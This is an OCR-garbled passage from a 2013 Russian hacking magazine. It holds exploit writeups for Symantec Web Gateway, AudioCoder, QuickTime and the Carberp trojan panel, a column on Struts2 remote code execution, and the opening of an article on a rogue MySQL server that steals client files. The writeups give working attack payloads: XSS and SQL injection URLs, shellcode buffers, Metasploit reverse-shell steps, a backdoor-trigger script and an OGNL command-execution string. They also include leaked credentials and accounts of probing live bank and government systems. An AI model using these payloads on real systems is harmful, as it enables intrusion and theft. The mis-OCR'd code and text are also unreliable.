стемные пользователи (например, арасііе) могут получить права админи- 
стратора из-за неправильной конфигурации программы зисіо. 

5. 80І_-инъекция — было найдено несколько инъекций, которые позволяют 
выполнить любую 80І_-команду, правда только авторизованным пользо- 
вателям с правами администратора. 

6. СЗРР (подделка межсайтовых запросов) — небольшая встроенная защи- 
та от атак такого типа легко обходится, что позволяет атакующему отпра- 
вить нужные запросы в контексте сессии администратора. 

Как видишь, если объединить эксплуатацию нескольких уязвимостей 
в одну цепочку, можно получить права администратора в атакуемой сети. Да- 
лее рассмотрим примеры уязвимых скриптов для каждой уязвимости. 

ЕХРЮІТ 

Отраженная Х88 — следующий адрес демонстрирует эксплуатацию на при- 
мере стандартной функции а1ег1:(): 





7* 



Взлом 



ХАКЕР 09/176/2013 



Ы=1=р5 : //<Іі05І=>/5руыа11/-РеесІЬаск_перог1:. р!ір?грр=Ѳ%27%20<-' 

оігРоси5=%22а1ег1:%28%27х5 5%27%29%22%2Ѳаи1=о-Роси5/%ЗЕ 

1 . Хранимая ХЗЗ — страница ЬІоскесІ . рНр, которая позволяет вставить код 
скрипта в панель администратора без авторизации. Ниже продемонстри- 
рован адрес атаки, где полезная нагрузка сохраняется в параметре и: 

И1:1=р5 : //<Іі05І=>/5руыа11/ЫоскесІ . рНр?±сІ=1&ИІ5І=огу=- 2&и=%27/ч— ■ 
%ЗЕ%ЗС5СГІр1:%ЗЕа1ег1:%28%27х5 5%27%29;%ЗС/5СПІр1:%ЗЕ 

2. Инъекция системных команд — функционал, изменяющий имя хоста и бо- 
лее известный как тестовый пинг (Тез* Ріпд), позволяет вставить произ- 
вольную системную команду, закрыв с помощью кавычки (V). Такие ко- 
манды выполнятся в системе с правами пользователя арасЬе. Уязвимы 
скрипты /5рума11/патеСоп6§. рЬр и /зру\л/а11/пе1:\л/огкСоп6§.рІір. 

3. Неправильная конфигурация безопасности — файл /еЬс/зисІоегз по- 
зволяет пользователям арасііе и асітіп запускать некоторые критичные 
команды с правами администратора. Например, пользователь арасЬе мо- 
жет запускать такие команды, каксіітосі, сііоып и іпзтосі, без ввода пароля. 

4. ЗОЬинъекция — ниже представлено несколько примеров, выводящих все 
имена пользователей и хеши их паролей в системе: 




Панель администратора Зутапіес ѴѴеЬ Оаіеѵѵау 



То Иеір ргоіесі уоиг 5есигіІу, Іпіегпеі Ехріогег Из5 ЫоскесІ 4ЬІ5 ѵѵеЬ$гіе Лот сіізріауіпд сопіепі ѵѵ№Ь 5есигі1у сеПІЛсзІе еггоге. СІіск Ьеге ?ог орйопз... 



© 5утапІес 

ѴѴеЬ Саіеѵѵау 



Мііірз : //<Ііо5І:>/5рѵыа11/-РеесІЬаск_пероп1: . р!ір?ѵагіаЫе[ ]=!)<-■ 
ІШОІѴ 5ЕІ.ЕСТ 1.2.3.4.изегпате.6.7.8.9.ра55і\/огсІ ГКОМ изегз <-■ 

--&орега1:оп[]=по1:едиа1&орепапсІ[]=х 

Іі1=1=р5 : //<Іі05І=>/5рѵіл/а11/есІі1=_а1ег1= . рЬр?а1ег1:ісІ=11%20иміОМ% << — ■ 
2Ѳ5ЕІ_ЕСТ%201 , 2 , изегпате , раззіл/огсі , 5 , 6 , 7 , 8 , 9 , 10 , 111 , 12 , 13 , 14 ,+-■ 
15,16,17, 18%2ѲРКОМ%20и5ег5%20- -%20 

5. СЗВР — следующий запрос настраивает ШАР-сервер на аутентифика- 
цию пользователя с правами администратора: 

Р05Т /зрушаИ/ІсІарС опбе. рМ р НТТ Р/1 . 1 

Нобі:: <Ііо5І=> 

Соокіе: РНР5Е55ІР=<ѵа1ісІ-соокіе> 

СоггЕеітЕ-Туре : аррІісаІііоп/х-ыым-Тогіті-игІепсосІесІ 

Сопііепі: - Ьеп^іііп : 247 

рр5І:1=іте=9999999999&5аѵеРопт=5аѵе&и5е1сІар=1&1сІар_Іі05І==4-- 

0 . 0 . 0 . 0&1сІар_рог1:=389&аи1=Іі _те1=ІіосІ=5ітр1е&5еагсІі_Ьа5е=сІс%ЗР4-< 
1:е5І:%2СсІс%ЗР1оса1&1сІар_и5ег=1:е5І:&1сІар_ра5 5ыогсІ=1:е5І:&сІер1:_<-‘ 
1:ѵре=сІер1:&и5ег_а1:1:гіЬи1:е=5АМАссоип1:І\Іате&и5ег_а1:1:гіЬи1:е_<--‘ 
о1:Ьег=&1 сІар_1:ітеои 1: =168 

Единственная защита от СЗВР-атак заключается в параметре розЫііте, 
который содержит время в формате ипіх Ьітезііатр. Его значение должно 
быть больше, чем было в последнем запросе. Поэтому можно передать заве- 
домо большее значение, например 9999999999, и запрос всегда будет успеш- 
но выполнен. 

Исходя из всех перечисленных выше уязвимостей, можно вывести следу- 
ющий сценарий атаки: 

1. Пользователь, защищенный с помощью Зутап1:ес ѴѴеЬ Са*е\л/ау, заходит 
на страницу, которая содержит изображение, ссылку или і*гате. Ссылка 
указывает на запрещенную страницу (например, тестовый ЕІСАРІ-файл) 
и содержит скрипт (ХЗЗ). 

2. 8утап1:ес ѴѴеЬ Оаіеѵѵау блокирует запрос и перенаправляет пользовате- 
ля на скрипт ЫоскесІ. рЬр. Если заблокированная ссылка содержит пара- 
метр ІіІ5І:огу=-2 (который любезно добавил атакующий), то адрес/скрипт 
(ХЗЗ) автоматически сохранится как «заблокированное сообщение обрат- 
ной связи» (ВІоскесІ РееЬЬаск) в интерфейсе администратора. 

3. Когда администратор посетит страницу с «заблокированным сообщени- 
ем обратной связи», сохраненный скрипт автоматически выполнится. Он, 
в свою очередь, может использовать уязвимость инъекции системных ко- 
манд для автоматической загрузки и выполнения шелла. 

4. Так как пользователь арасЬе может выполнять команды сіітосі и сЬомп 
как администратор, наш шелл создаст и выполнит бинарник с ЗЫЮ-битом. 

5. Теперь у атакующего есть доступ к системе с наивысшими (администра- 
торскими) правами. 

Так что вся атака упирается лишь в пользователя, который посетит «вре- 
доносную» страницу. Если же у атакующего есть доступ к интересующей сети, 
то ХЗЗ-уязвимость может быть проэксплуатирована напрямую. Автор пишет, 
что обладает полным исходным кодом такого эксплойта, но выкладывать его 
в открытый доступ он пока не планирует. 

ТАПСЕТ8 

Зутапіес ѴѴеЬ Оаіеѵѵау <= 5.1 .0.*. 



Сопіепі: ѵѵа$ ЫоскесІ Ьесаизе іі ѵѵаз поі зідпесі Ьу а ѵаіісі зесигііу сеііііісаіе. 

Рог тоге іпіогтаііоп, $ее "СегМісаІе Еггогі" іп Іпіете» Ехріогег Неір. 

Пример заблокированной с помощью Зутапіес ѴѴеЬ Оаіеѵѵау страницы 

80ШТІ0Ы 

Есть исправления от производителя. 



ПЕРЕПОЛНЕНИЕ БУФЕРА В АІЮІОСОѴЕР 0.8.22 



СѴ55ѵ2: 


ІЧ/А 


Дата релиза: 


1 июля 2013 года 


Автор: 


плеіасот, опуіпд 


СѴЕ: 


ІЧ/А 



1 мая 2013 года была опубликована похожая уязвимость для этой же програм- 
мы версии 0.8.18, но для ее эксплуатации надо было создать специальный 
файл в формате МЗЫ. Другие исследователи выяснили, что можно использо- 
вать формат Ізі и версия 0.8.22 также уязвима. Оба формата — музыкальные 
плей-листы, и если пользователь добавит такой специальный файл, то это по- 
зволит атакующему выполнить свой код. 

ЕХРДОІТ 

Разберем эксплойт: 

# X - любой шелл-код, можно сгенерировать с помощью тз-рраѵіоасі 



зііеіісосіе = "\х89\хеѲ. . . " 


+ X 


61е = " 


Тип. Ізі:" 


# Имя файла 


ИеасІ = 


"МПгр://" 


# Заголовок 


іипк = 


"\х9Ѳ" * 765 


# Переполнение, чтобы перезаписать 


# регистр ЕІР 


пзеЬ = 


"\хЕВ\хѲб\х9Ѳ\х9Ѳ" 


# Небольшой прыжок в 6 байт 


зеіі = 


"\хЕЕ\х04\х01\х66" 


# ... КЕТІѴ 1іЬісопѵ-2.сІ11 


порз = 


"\х9Ѳ" * 80 




*ех*Л1е 


= ореп(Т1е , 'ы') 




1: ехііб 1 е . ы г і 1: е ( Іі е а сі + і и п к 


+ пзеіі + зеіі + порз + зііеіісосіе) 


1:ех1:61е.с1о5е() 



ТАНСЕТ8 

АисІіоСоѵег 0.8.22 и ниже. 



80ШТІ0Ы 

На момент публикации не было исправлений. 

ПЕРЕПОЛНЕНИЕ БУФЕРА 
В АРРІ.Е ОШСКИМ Е 7 

СѴ55ѵ2: 7.5 (АѴ:М/АС:Ь/Аи:М/С:Р/І:Р/А:Р) 

Дата релиза: 24 мая 2013 года 

Автор: Тот ОаІІадЬег, РаиІ Ваіез 

СѴЕ: 2013-1017 
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Эта уязвимость позволяет удаленному атакующему выполнить произвольный 
код через установленную программу от Арріе — ОиіскТіте. От пользователя 
требуется зайти на вредоносную страницу или открыть специально сконстру- 
ированный файл. 

Специфичная ошибка возникает при обработке файла в формате МОѴ. 
Это происходит из-за недостаточной проверки длины данных для указан- 
ных атомов, таких как гсігТ или сігеТ, в записи Аііб. Значение между этими 
атомами используется для определения, сколько байт копировать в буфер, 
без достаточной проверки значения, из-за чего значение может быть больше 
размера буфера. В результате возникает переполнение. После этого у ата- 
кующего будет гарантированный доступ к памяти и возможность выполнить 
произвольный коде правами авторизованного пользователя. 



ЕХРЮІТ 

Ниже разобран формат специально сконструированного файла, который ис- 
пользуется в качестве эксплойта: 

тоѵ = "ХхѲ0\хѲѲ\х0б\хРЕ" # Размер файла 



тоѵ << "тооѵ" # тооѵ атом 



тоѵ 


<< 


" \хѲѲ\хѲѲ\хѲ6\хР7" 


# 


размер 


(1751с!) 


тоѵ 


<< 


"гтга" 


# 


Ссылка 


на тооѵ атом 


тоѵ 


<< 


" \хѲ0\х00\х06\хСР " 


# 


размер 


(1743с!) 


тоѵ 


<< 


"гтсіа" 


# 


гтсіа атом 


тоѵ 


<< 


" \х00\х00\х06\хВР " 


# 


размер 


( 1727с!) 


тоѵ 


<< 


"гсіг-Р" 


# Данные 


ссылки атом 


тоѵ 


<< 


" \х00\х0Ѳ\х00\хѲ0 " 


# 


Устанавливаем размер в 0 


тоѵ 


<< 


"аІІБ" 


# 


Ссылка 


на тип: Р5 аііз запись 


тоѵ 


<< 


" \хѲ0\х0Ѳ\х06\хАА" 


# 


размер 


(1706с!) 


тоѵ 


<< 


гапсі іехі: а1оііа(8) 








тоѵ 


<< 


"\х00\х00\х0б\х61" 


# 


размер 


(1633с!) 


тоѵ 


<< 


гапсі -Ьехі: аІрТіа С 38 ) 








тоѵ 


<< 


"\х12" 








тоѵ 


<< 


гапсі іехі а1рЬа(81) 








тоѵ 


<< 


"ХхГГХхГГ" 








тоѵ 


<< 


гапсі іехі а1оііа(18) 








тоѵ 


<< 


"\х00\х08" 


# 


размер 


(8сі) 


тоѵ 


<< 


гапсі -Ьехі: аІрТіа С 8 ) 








тоѵ 


<< 


"\х00\х00" 








тоѵ 


<< 


"\х00\х08" 


# 


размер 


(8сі) 


тоѵ 


<< 


гапсі іехі: аІрТіа С 8 ) 








тоѵ 


<< 


"\х00\х00" 








тоѵ 


<< 


"\х001х2б м 


# 


размер 


(В8сП 


тоѵ 


<< 


гапсі іехі: а1рЬа(38) 








тоѵ 


<< 


"ХхѲѲХхѲРХхѲѲХхѲЕ" 








тоѵ 


<< 


"АА" 


# 


размер 


(должен быть неправильным) 


тоѵ 


<< 


гапсі іехі а1рЬа(12) 








тоѵ 


<< 


" ХхѲѲ\х12\хѲѲ\х21 " 








тоѵ 


<< 


гапсі іехі: аІрііа(Зб) 








тоѵ 


<< 


"\х00" 








тоѵ 


<< 


"ХхѲРХхЗЗ" 








тоѵ 


<< 


гапсі іехі: а1рЬа(17) 








тоѵ 


<< 


"Хх02\хР4" 


# 


размер 


(756Ь ) 


тоѵ 


<< 


гапсі іехі: а1рЬа(756) 






тоѵ 


<< 


"ХхРРХхРРХхѲѲХхѲѲХхѲѲ 1 






тоѵ 


<< 


Ьи-Р 


# 


полезная нагрузка 



Более подробно формат файлов для ОиіскТіте расписан на официальном 
сайте Арріе в разделе для разработчиков ( ЬіЦѵ/ІЗСЗІМѴѴО ). А для создания 
атакующей НТМЬстраницы с созданным «полезным» файлом воспользуемся 
МеІазрІоіІ-модулем: 



Пример успешной 
атаки на одну из адми- 
нистративных панелей 
трояна СагЬегр 



СагЬегр К.СЕ 


Ротаіп: Ьвр://Ьгооріе76.пеі 


^ Оѵѵпг! 


БасаЬазе 




Нозс : ІосаШозс 
Чзег: изегйЬ 
Разз: ауГОГСуСУ 
ЧВ : изегсІЪ 




Озегз 




асітіп : 5Гс3515Ье5еаЪ3136с116еа373620Г9ас 
ЗоЬпйоеІ : 5іс3515Ье5еаЬ8136с116еа37362059ас 




АисЬ Кеу 




Ьсср : //йгооріе7б . пеС/1одіп/?х=11111111111111111111111111111111 



тз-Р > изе ехр1оі1:/ыіпсІоы5/Ьпоы5еп/арр1е_диіск1:іте_псІг-Р. гЬ 

тзТ ехріоіі^арріедиіскііігпегсіг-р. гЬ) > <-■ 

зеі: РАУ1.0АР ыіпсІоы5/те1:егрге1:ег/пеѵег5е_1:ср 

ігіБ-Р ехр!оі1:(арр1е_диіск1:іте_гсІг-Р. гЬ) > зеі: 192.168.24.141 

тз-Р ехріоіі: (арріе диіекіііте гсіг-Р.гЬ) > ехріоіі: 

ТАПСЕТ8 

ОиіскТіте 7.7.3 и ниже. 

80ШТІ0Ы 

Есть патч от производителя. 

УДАЛЕННОЕ ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОГО 
КОДА В САРВЕРР ѴѴЕВ РАНЕЬ С2 

СѴ55ѵ2: ІЧ/А 

Дата релиза: 28 июня 2013 года 

Автор: Хуіііоі 

СѴЕ: І\І/А 

В конце июня случился переломный момент в современном вирусописа- 
нии. Если раньше у большинства людей были только исходники трояна 2еиз, 
то теперь в публичный доступ утекли исходники банковского трояна СагЬегр 
вместе с буткит-фреймворком и административной панелью. Один из по- 
пулярных исследователей вредоносных программ Хуіііоі решил провести ау- 
дит исходного кода последней и сразу же нашел вот такой код: 

Ш@$_Р05У ісГ ( == 1 ВОТІ\ІЕТСНЕСКЦРРАТЕКѲ-1лІР85зи5ѴК1НЦ8з1Ѵ' ){ 

//Ккеѵ епсі 

і-р ( ! етрііу ($_Р05Т ' сіаііа ' ()) еѵа1(раск("Н*" . <-> 

Ьазеб4 с!есосІе($ РОБУ сіаііа ' ())) ; 

ехіі: ; 

Как видишь, если пришел специальный РОЗТ-запрос с ключом 
ВОТМЕТСНЕСКІІРОАТЕК0-1лЮ85зи5ѴК1НІІ8]1Ѵ в параметре ісі, то скрипт выпол- 
нит любой код, зашифрованный с помощью алгоритма Вазе64 и переданный 
в параметре сіаііа. 



ЕХРЮІТ 

В качестве эксплойта можно воспользоваться следующими наработками: 

• Скрипт от автора можно скачать с его блога ( Ьі1.Іѵ/18ІХІВХеі- ). Сделан 
по принципу «нажать кнопку», нужно только ввести адрес предполагаемой 
административной панели. 

• Выпущен Меіазріоіі-модуль. 

Или самому в соответствующей программе, скрипте или плагине для бра- 
узера составить РОЗТ-запрос. Например, на языке РНР это будет выглядеть 
так: 

// Полезная нагрузка, зашифрованная с помощью алгоритма 

// Вазе64 

$с!а1:а = аггау( 

'ісГ => 1 В0ТІ\ІЕТСНЕСКЦРРАТЕКѲ-1лІР85іи5ѴК1НЦ8і1Ѵ' . 

' сіаііа ' => 

$сЬ = сиг і іпіііО ; 

сигі зе1=ор1:($сіі < СІІКІ.0РТ ЦК!.. % РОБТ'игІг' ( . "/іпсіех. рЬр") ; 
сиг1_зе1:ор1=($сІі. СЦКІ.ОРТНЕАРЕК. 0) ; 

сигі 5еіор1:($сІі.СЦКІ.0РТ Ц5ЕКА6ЕІЧУ "МогіІІаМ.Ѳ (сотраІііЫе; 

М5ІЕ 6.0; Ыіпсіоыб N1 5.1)"); 

сиг1_5е1:ор1=($сІі. СЦКІ.ОРТНТТРНЕАРЕК. апгау( ' Ехресі : ' )) ; 
сиг1_5е1:ор-Ь($сІі, СЦКШРТ КЕТЦКІ\ІТКАІ\ІБГЕК, 1); 

сигі _5еіор1:($сІі. СЦКІ.0РТ РОБУ 1) : 

сиг1_5е1:ор1=($сІі . СІЖІ.0РТТІМЕ01ІТ. 30) ; 

сигі БеІіорШсІі. СІЖІ.0РТ Р05ТРІЕІ.Р5. $с!а1=аУ. 

^согѵЬегѵЬБ = сиг1_ехес($сЬ) ; 

ТАНСЕТ8 

Все версии, установленные до 28 июня. Плюс те, которые будут использо- 
ваться вместе с опубликованными исходниками :). 

80ШТІ0Ы 

Патча на данный момент не существует. В качестве быстрого патча можно за- 
менить ключ ВОТІЧЕТСНЕСКІІРРАТЕК0 -1лЮ85] иБѴК1НІІ8з IV на любой другой. 30 
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АЛЕКСЕЙ СИНЦОВ 

Известный ѵѵЫІеПаі, докладчик назесигііу- 
конферениях, соорганизатор ^егоМдМз и просто 
отличный парень. В данный момент занимает 
должность РгіпсіраІ Зесигііу Епдіпеег в компании 
Мокіа, где отвечает за безопасность сервисов 
платформы НЕВЕ. 



КОЛОНКА 

АЛЕКСЕЯ СИНЦОВА 

СКОРОСТЬ 
РЕАКЦИИ КАК 
ПОКАЗАТЕЛЬ ИБ - 
1-0АУѴ80-0АѴ, 

ИЛИ ИСТОРИЯ ЕЩЕ 
ОДНОЙ БАГИ В ЗТВІЛ52 



Сегодня мы порассуждаем об одном событии, которое тихо про- 
изошло в середине июля. Мы будем говорить о скорости реак- 
ции на инцидент тех, кто должен защищать свои ресурсы, ну и, 
как водится, затронем проблемы индустрии ИБ. 



16 июля 

Тихим летним днем ребята из АрасНе Роипсіаііоп 
выпустили асіѵізогу об очередной уязвимо- 
сти в фреймворке 5ІШІ82. Как обычно, за этим 
фреймворком тянется шлейф уязвимостей, свя- 
занных с внедрением ОМОЬвыражений (есть та- 
кое в 5ігиіз2), и, как следствие, выполнение про- 
извольного кода. Суперпростые баги, дающие 
фактически шелл атакующему. Так и в этот раз 
вышел патч и описание новой проблемы — уда- 
ленное выполнение кода через внедрение ОЫСІ_: 

ЬІШІ. Давай я просто покажу, как это можно сде- 
лать — выполнить Ю вслепую (для краткости): 

ІтЕІір: //Іі05І=/ра1:Іі/ЫаІі-ЫаІі . ас1:іоп?<-< 
гес!ігес1=:${( '#2Іо%5С75(аЦаѵа Лап%..м 
Кип1:іте(Э^е1:Кип1:ітеО .ехесГ'ісГ”) ' )(е)> 

То, что между ${.. }, — этоиестьОМСЬвыражение. 
Быстрый тест на уязвимость: 



Іі1=1=р: //Ііо5І=/ра1=Іі/ЫаІі-ЫаІі.ас1=іоп?<-» 
гес!ігес1::${31338-1} 

Если будет редирект на 

Рііііір: //Ио51:/ра1:Ь/31337 

значит, ОИСИ-выражение прошло (вычитание 
единицы). Как видно, уязвимость простая и... 
массовая. Дело в том, что фреймворк Зігиіз до- 
статочно популярен, можно найти сайты банков, 
включая ДБО, правительственные сайты и даже 
военные сайты, которые работают на нем. Есть 
адвайзори и простая, но действенная уязвимость. 

І-БАУОВО-ОАУ 

Это, конечно, не 0-дей, и вроде, раз есть адвай- 
зори, тема исчерпана и мир в безопасности. Ре- 
серчеры нашли багу, сообщили вендору, вендор 
сделал патч и написал мимимишное адвайзори. 
Но некоторые товарищи из Китая сразу же, того 



же 16-го числа написали рабочий эксплойт (в ад- 
вайзори была урезанная версия, с анти-скрипт- 
кидди триками). Более того, они сделали одно- 
кнопочный пывнер и выложили где-то там у себя 
в китайском блоге ( кихоо.сот/агсІііѵез/260 ). 
И тут армия скрипт-кидди, кибертеррористов, 
ресерчеров и разных плохих и хороших китайцев 
бросилась взламывать интернет. Весь и сразу. 
Да это 1-дей... но подумай, кто УСПЕЛ и СМОГ 
бы защититься? Обновить фреймворк — это ра- 
бота, а в некоторых часовых поясах люди еще 
спят. Кроме того, некоторые не могут просто так 
взять и обновить 5ІШІ32. Надо сделать это сна- 
чала в ОА... И потом, более важное, — НИКТО ад- 
вайзори не читает, тем более что сообщения 
об уязвимости не было ни в СЕПТ, нигде... Так, 
на сайте зігиіз.аоасііе.ога очередное обновле- 
ние. ѴѴНо сагез? 

«БУМАЖНАЯ И Б» 

В это время кипит ИБ-бизнес, продаются услуги 
консультантов, услуги пентеста, дорогие скане- 
ры безопасности и железки, которые предот- 
вратят вторжение. Стандарты, сертифицирован- 
ные специалисты, конференции... куча всего. 
Но как это поможет, если некоторые стандарты, 
такие как РСІ Э83, дают месяц на установление 
критичного патча! А Китай пошел в атаку уже 
17-го числа... то есть через один день после вы- 
хода патча. Например, 24 июля я проверил, стоит 
ли этот патч на системе ДБО, работающей с кар- 
тами одного из крупнейших банков... и, конечно, 
там была дыра. Ну как, все о’кей... по стандарту. 
Более того, немного погуглив, я нашел уязвимый 
сервис госзаказов одного из регионов РФ (нет 
патча на 26-е число, спустя десять дней после 



<- - С .оѵЬ.сот/д2Даѵа.Іапд.ІІМІХРгосе55@1Ь55ееТ7 




Опа, ПСЕ. На скриншоте виден указатель на созданный процесс 
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Эксплойт не прошел, команда Арріе среагировала на инцидент :) 



И опять зііеіі-доступ на сервере Арріе. Банально 



начала атак)! А дело в том, что там нет людей, за- 
нимающихся ИБ. Нет, там есть СІЗО, но они сей- 
час, возможно, читают блог Алексея Лукацкого 
и думают о рисках, о высоком... Есть админы, 
но они занимаются совсем другим (скорее все- 
го, именно они обнаружат атаки — может, когда 
уже будет бот, — и сделают, конечно, фикс). Бу- 
дем надеяться, что там есть хотя бы НЮ5, кото- 
рые обнаружат атакующего уже после вторже- 
ния... (кстати, банк поставил фикс 25-го числа, 
спустя девять дней). 

Нет, я согласен, ситуация тяжелая, но можно 
ли с ней бороться? Возьмем как пример платеж- 
ную систему ОІѴѴІ. Милые и открытые ребята, 
но и у них все построено на 5ІШІ82. Тем не ме- 
нее 18-го числа уязвимости уже не было. Они 
запатчили за два дня, что в некотором, высоком 
приближении могло случиться до того, как ІР- 
сканеры из Китая доберутся до российского сег- 
мента. Крупнейший банк проиграл более техно- 
логичному ОІѴѴІ. А еще у ОІѴѴІ багбаунти, что также 
могло повлиять на скорость реакции, например, 
какой-нибудь ресерчер успел сообщить о баге. 
Но важен результат — ОІѴѴІ показали, что защи- 
щаться они умеют хорошо. Например, мы узнали 
об уязвимости от китайских коллег и уже 16-17- 
го числа стали разворачивать фиксы. При этом 
18 июля в логах уже стали светиться китайские 
ІР-адреса с шаблонами атак. Благодаря тому 
что наши специалисты по ИБ мониторили блоги 
(по собственной инициативе) с паблик-сплоита- 
ми в китайском регионе, мы оказались быстрее. 
К слову, от СЕРТ мы получили уведомление 22- 
го числа, что могло быть поздно... а для кого-то 
и было поздно. Так, был взломан беѵеіорег.арріе. 
сот. Он крутился именно на 5ІШІ82 и не успел 
обновиться... всего каких-то три дня с момен- 
та выхода патча. Только прогремели новости 
о взломе ресурса Арріе, как тут же выясняется, 
что хакеры получили доступ к базе данных ОѴН. 
сот (один из крупнейших хостингов). На сайте 
пишется что-то про взлом по етаіі и кражу ѴРІМ- 
ключей... но я нашел там 31 тіД 52, причем непат- 
ченный! Может, хакеры проникли и через почту, 
но как-то даты уж больно близки... В общем, суть 
одна: нельзя полагаться на законы, бумаги, ин- 
струкции и стандарты — это совершенно другая 
реальность. Обязательно должны быть люди, 
которые понимают, что происходит в ИБ, в ІТ 
Зесигііу, — без них никуда. Подумай — сейчас 
висит уязвимость удаленного выполнения кода 
на сайте госзаказов одного из регионов РФ... 
То есть на момент написания в РФ только один 
ОІѴѴІ показал достойный результат, а госзака- 
зы... ладно, пусть Китай поучаствует :). И дело 



не в том, что есть какая-то бага, баги будут всег- 
да — дело в том, что индустрия И Б не работает 
так, как хотелось бы тем, кто действительно па- 
рится о защите своей информации. Она рабо- 
тает так, как надо продавцам И Б- решений. Хотя 
дело не только в технологиях и индустрии, а еще 
и в людях и процессах. 

Как-то непатриотично. Давай посмотрим дру- 
гой пример, связанный с инженерной реакцией: 
система аутентификации в Зопу Епіегіаіптепі: 
ІМеІѵѵогк построена на 5ІШІ82, как и один из сер- 
висов Арріе — ехргеззіапе. арріе. сот. Ребята 
(особенно из «Эппл») были уже не понаслышке 
знакомы с этой начавшейся волной атак. Они 
быстренько замутили хотфикс, и поэтому китай- 
ский эксплойт не работает (сделали это в райо- 
не 18-19-го числа). Надо сказать, мы удачно до- 
гадались проверить, что эксплойт работает еще 
и в РОЗТ. Поэтому наш хотфикс это учитывал, зато 
ребята из «Сони» и «Эппл» не додумались и в ито- 
ге опять оказались уязвимы. Тем не менее после 
моего репорта им и Зопу, и Арріе отреагировали 
на репорт в течение десяти часов; это говорит 
о том, что люди там есть, а пропустить менее 
стандартный вектор атаки и слишком довериться 
инструменту защиты, будь то ѴѴаР или ІРЗ, может 
каждый. 



ВЫВОДЫ 

Скорость и качество реакции на событие в кон- 
тексте современных угроз достаточно важный 
элемент. Как видно из примеров, тебя не спасет 
модная железка, тебя не спасут стандарты РСІ 
Э88 или 130, умный СІЗО не поможет и талант- 
ливый админ не успеет. Однако такая мелочь, 
как багбаунти, может неожиданно прокнуть! Или 
сотрудники компании, которые понимают, что та- 
кое хакеры и как ломать, вовремя просекут фиш- 
ку и успеют предупредить угрозу в реальной сре- 
де с реальными данными. Это люди, это процесс 
(например, можно провести инвентаризацию 
стека ПО и анализировать каждый вышедший 
апдейт, хотя для больших компаний это не вари- 
ант). Есть разные пути решения, и даже в гонке, 
где каждый день на счету и кажется, что успеть 
нельзя, при хорошей зесигііу/гезропзе-команде 
можно отбиться. Нужна ли вам такая команда 
или достаточно СІЗО-блогера — решать, конеч- 
но, бизнесу. 

Моя мысль проста: озаботиться регулятора- 
ми, бумажками, рисками и забить на инженер- 
ные дела — это провал ИБ, но, к сожалению, сей- 
час индустрия движется именно в эту сторону, 
особенно в РФ, и в твоих силах попытаться из- 
менить это : ) . ЭЕ 
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НТТР/1.1 200 ок 
Оаѣе: Ней, 24 Лиі 2013 16:24:20 СИТ 

Зес-Соокіе: С5Е55іаЫІВ=2В2СЕВ17941Е8АВГ68В4541ВС5Е62СВ8 . 1ѵр-рі-прдгсс04-2309; РасЬ=/; Зесиге; НССрОпІу 
Кеер-АІіѵе: сітеоиС=15, тах=100 
Соппессіоп: Кеер-АІіѵе 

СопСепС-Туре : СехС/рІаіп; сЬагзеС=ІЛТ-8 

ЗеС-Соокіе: Т37гВс9е=С6е3447ее867141а70Ъ0е3024се014Веа4Ьае663 19а0аЪ7е51е«:ЕЪ4; РаСЬ=/ 

Сопсепс-ЬепдсЬ: 50001 



|иіс1-1537 (сотсас) дісі=і00(ш 



дгоирз=100 (і 



<- 

Эксплойт не прошел, 
придется чуть-чуть по- 
хитрить... 

ЗІіеІІ-доступ на сер- 
вере Зопу. Я побывал 
там, где когда-то были 
анонимусы. Романтика 



ѴѴАІШШС 

Вся информация предо- 
ставлена исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут от- 
ветственности залюбой 
возможный вред, при- 
чиненный материалами 
данной статьи. 
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Взлом 
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Вся информация предо- 
ставлена исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут от- 
ветственности залюбой 
возможный вред, при- 
чиненный материалами 
данной статьи. 





Алексей Осипов 

@0іК5ІІпдіѵеп 




Михаил Фирстов 

ЭсѵЬегоипкѵсІі 




БОЕВОЙ 

ХОН И ПОТ 

ИЗ БАЗЫ 
ДАННЫХ 



КРАТКОЕ СОДЕРЖАНИЕ 
ДЛЯ САМЫХ НЕТЕРПЕЛИВЫХ 

Теплый июньский день перед выходным. Ничто 
не предвещало беды, и тут некто Денис Баранов 
совместно с Михаилом Фирстовым и Алексеем 
Осиповым находят О-бау-фичу в реализации 
50І_-оператора ЮАР РАТА І_ОСАІ_ІМРІІ_Е и пишут 
под нее сплоит. 

ТЕПЕРЬ ПО ПОРЯДКУ 

Все началось с того, что в Сети обнаружился за- 
бавный хак-квест. В одном из уровней необхо- 
димо было влиять на строку соединения к базе 
данных. Идея понятная: если подменить адрес 
СУБД, то Му50І_-клиент подключится не к серве- 
ру разработчика, а к серверу, контролируемому 
хакером. А значит, для обхода авторизации до- 
статочно поднять свой МуЗОЬсервер и подме- 
нить таблицу с пользователями на свою. Тема не 
новая: подробнее об атаках с изменением строки 
соединения можно прочитать, к примеру, на гбоі:. 



Денис Баранов 

@(І5Ьагапоѵ 




Юрий Гольцев 

@ѵдоІІ5еѵ 



Сногсшибательный вектор атак на клиенты МуЗДЬ 



База данных — лакомый кусочек для хакера. Но атакующий в погоне за информа- 
цией в СУБД сам может стать жертвой. Из-за лазейки, оставленной разработчиком, 
клиент вместо того, чтобы прочитать данные из базы, сам того не подозревая, может 
передать на сервер произвольный файл со своей системы! Как такое может быть? 
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2. Сервер отвечает нам неким пакетом, содер- 
жащим имя файла, которое было передано 
клиентом. 

3. Клиент отправляет содержимое файла на сер- 
вер. 

Странное поведение, не находишь? Сразу 
бросается в глаза, что всю эту последователь- 
ность можно сократить до одного шага — шага но- 
мер 3. Почуяв неладное, мы решили разобраться. 
И немного заморочившись с настройками прок- 
сирования, получили неожиданный результат. 

Если на произвольный запрос Му50І_- клиента 
мы отправим пакет #2, клиент сразу отправит нам 
содержимое файла независимо от того, какой из- 
начально был запрос! 

Сервер просит файл? Дадим ему файл! 

ПРОЧТИ ФАЙЛ! ПОЖАЛУЙСТА 

В срочном порядке был набросан небольшой 
сплоит на питоне с гордым названием годие_ 



Клиент отправляет запрос на сервер #1 



огд ( Ы1:.Іѵ/14гУОА9 ). Но появилась идея: если че- 
ловек сам соединяется с твоим сервером, почему 
бы не найти вариант получения доступа к хосту, 
с которого он осуществляет соединение? 

Есть идея — нужно пробовать! На ум сра- 
зу пришел замечательный оператор ЮАР РАТА 
І_ОСАІ_, который позволяет пользователю базы 
данных считать файлы со своей локальной систе- 
мы и отправить их на сервер базы данных. Удоб- 
ная функция, чтобы не приходилось писать скрип- 
ты или загружать файлы на сервер. И более того, 
